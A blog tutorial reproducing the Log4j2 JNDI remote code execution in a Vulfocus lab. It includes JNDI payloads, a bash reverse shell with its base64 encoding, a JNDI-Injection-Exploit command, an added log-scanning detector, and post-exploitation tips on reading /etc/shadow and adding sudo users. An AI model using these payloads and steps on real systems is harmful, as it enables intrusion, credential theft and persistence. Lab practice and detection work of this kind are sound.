Related reading
A follower previously published a Log4j vulnerability reproduction tutorial; today we add a supplement, so read on if you are interested. It includes both the POC and the EXP.
Preparation
- Target VM: CentOS, 192.168.10.215, used to host the Vulfocus log4j2 vulnerable image
- Attacking client: Ubuntu, 192.168.10.217, used to perform the RCE and remotely control the target machine
Lab deployment
Refer to our earlier article and deploy Vulfocus with Docker.
Download and start the image
This assumes you have already deployed Vulfocus via Docker and logged in (default credentials admin/admin).
In the Vulfocus backend, download the vulfocus/log4j2-rce-2021-12-09:latest image.
![Figure 1 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120124129206-1024x326.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then start the image from the home page.
![Figure 2 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120124256730-1024x510.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
![Figure 3 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120135530478.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Reproduction steps
Task 1: DNSLog callback
First obtain a domain from http://www.dnslog.cn/; we will use it to test whether the callback arrives.
![Figure 4 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120135552576-1024x307.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
q98csp.dnslog.cn is the domain we obtained; we will use it shortly to verify the callback.
Visit the target page. A normal request looks like this:
http://192.168.10.215:12219/hello?payload=111
![Figure 5 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120142811889.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Now open BurpSuite and set the browser's FoxyProxy extension to the proxy profile used for interception.
![Figure 6 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120135650563-1024x132.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Capture the request with BurpSuite and send it to the Repeater module.
![Figure 7 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120142925808-1024x591.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then modify the payload parameter and submit:
payload=${jndi:ldap://q98csp.dnslog.cn}
![Figure 8 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120142956217-1024x641.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
This time the response status is 400.
![Figure 9 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143126552-1024x715.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
We try URL encoding. Note that only the part after payload= should be encoded, otherwise the injection fails.
![Figure 10 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143133624-1024x778.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then submit.
![Figure 11 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143201755-1024x709.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
The response status is now 200, which means the request was accepted.
![Figure 12 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143220869-1024x572.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Now go back to the http://www.dnslog.cn/ page and click Refresh Record.
![Figure 13 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143324174-1024x300.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
The callback succeeded: the IP address is now visible, which confirms that the request we just submitted triggered the Log4j2 vulnerability.
![Figure 14 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143341669-1024x314.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Task 2: RCE (remote command execution)
Next we complete the exploitation. Through the Log4j2 vulnerability we can attempt to take remote control of the server; the core of it is still a reverse shell, which we have covered before. See this video for the detailed principle.
First open a new terminal and start a listener on port 4444:
ncat -lvvp 4444
![Figure 15 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150100931.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Generate the reverse shell command with the online reverse-shell generator:
![Figure 16 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145216903-1024x683.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
bash -i >& /dev/tcp/192.168.10.217/4444 0>&1
Then base64-encode it:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIxNy80NDQ0IDA+JjE=
![Figure 17 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145427119.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then use it together with our JNDI injection tool; the command is as follows:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIxNy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.10.217
Upload the JNDI injection tool (JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar) and run the command above in a terminal.
![Figure 18 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145647804-1024x193.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Copy rmi://192.168.10.217:1099/6icmea and put it into the payload parameter.
![Figure 19 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145919778-1024x703.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then URL-encode the part after payload=.
![Figure 20 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145946110-1024x769.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then submit.
![Figure 21 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145955406-1024x708.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
We can see that a connection appears to be established.
![Figure 22 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150147347-1024x505.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Back in the terminal that was listening on port 4444, we find that we are connected to the 192.168.10.215 VM.
![Figure 23 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150355216.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then cd ../tmp and the flag is there.
![Figure 24 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150613995.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
![Figure 25 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150619334.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Challenge cleared.
![Figure 26 - Vulfocus lab: log4j2 RCE reproduction (vulfocus/log4j2-rce-2021-12-09) - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150639757.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
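From the defender's side, the requests in Task 1 and Task 2 leave a clear trace in the web server's access log: a `${jndi:...}` lookup that only becomes visible once the percent-encoding the walkthrough applies is undone. The following scanner is an added example (not part of the original post); the log lines are constructed, modelled on the two requests above, and the domain example.test and the client 10.0.0.5 are made-up values.

```python
import re
from urllib.parse import unquote

# A JNDI lookup as it appears in the walkthrough: ${jndi:<scheme>://<target>}
# (the post uses ldap:// for the DNSLog test and rmi:// for the RCE step)
JNDI_RE = re.compile(
    r"\$\{\s*jndi:\s*(ldap|ldaps|rmi|dns|iiop|http)://([^}\s]+)", re.IGNORECASE
)


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing (catches double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi(text):
    """Return (scheme, target) pairs for every JNDI lookup found after decoding."""
    return [(m.group(1).lower(), m.group(2)) for m in JNDI_RE.finditer(decode_fully(text))]


def scan_access_log(lines):
    """Scan combined-format access log lines; return (client_ip, hits) per matching line."""
    findings = []
    for line in lines:
        hits = find_jndi(line)
        if hits:
            findings.append((line.split()[0], hits))
    return findings


# Constructed sample lines modelled on the requests in this walkthrough (not real traffic)
SAMPLE_LOG = [
    '192.168.10.217 - - [20/Jan/2022:14:28:11 +0800] "GET /hello?payload=111 HTTP/1.1" 200 12',
    # URL-encoded ${jndi:ldap://q98csp.dnslog.cn} as submitted in Task 1
    '192.168.10.217 - - [20/Jan/2022:14:31:26 +0800] "GET /hello?payload=%24%7Bjndi%3Aldap%3A%2F%2Fq98csp.dnslog.cn%7D HTTP/1.1" 200 12',
    # URL-encoded ${jndi:rmi://192.168.10.217:1099/6icmea} as submitted in Task 2
    '192.168.10.217 - - [20/Jan/2022:14:59:55 +0800] "GET /hello?payload=%24%7Bjndi%3Armi%3A%2F%2F192.168.10.217%3A1099%2F6icmea%7D HTTP/1.1" 200 12',
    # double-encoded variant, constructed to show why decoding has to be repeated
    '10.0.0.5 - - [20/Jan/2022:15:02:00 +0800] "GET /hello?payload=%2524%257Bjndi%253Aldap%253A%252F%252Fexample.test%257D HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for ip, hits in scan_access_log(SAMPLE_LOG):
        print(ip, hits)
```

The pattern covers the literal `${jndi:` form used in this walkthrough and is a detection aid only; the actual fix is upgrading log4j-core to a patched release.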
Of course, once you have reached the remote-connection stage there is a lot more you can do; we compiled some common commands earlier:
- Get system account information (`cat /etc/shadow`). Once you have the account names and hashed passwords, you can crack them with hashcat, which we covered before.
- Add a user (`useradd -m <username>`)
- Elevate the user's privileges (`usermod -G sudo <username>`)
Related tools
- DNS callback site: http://www.dnslog.cn/
- Online reverse-shell generator: https://www.iculture.cc/rce/
- JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar: https://pan.iculture.cc/s/kgjIk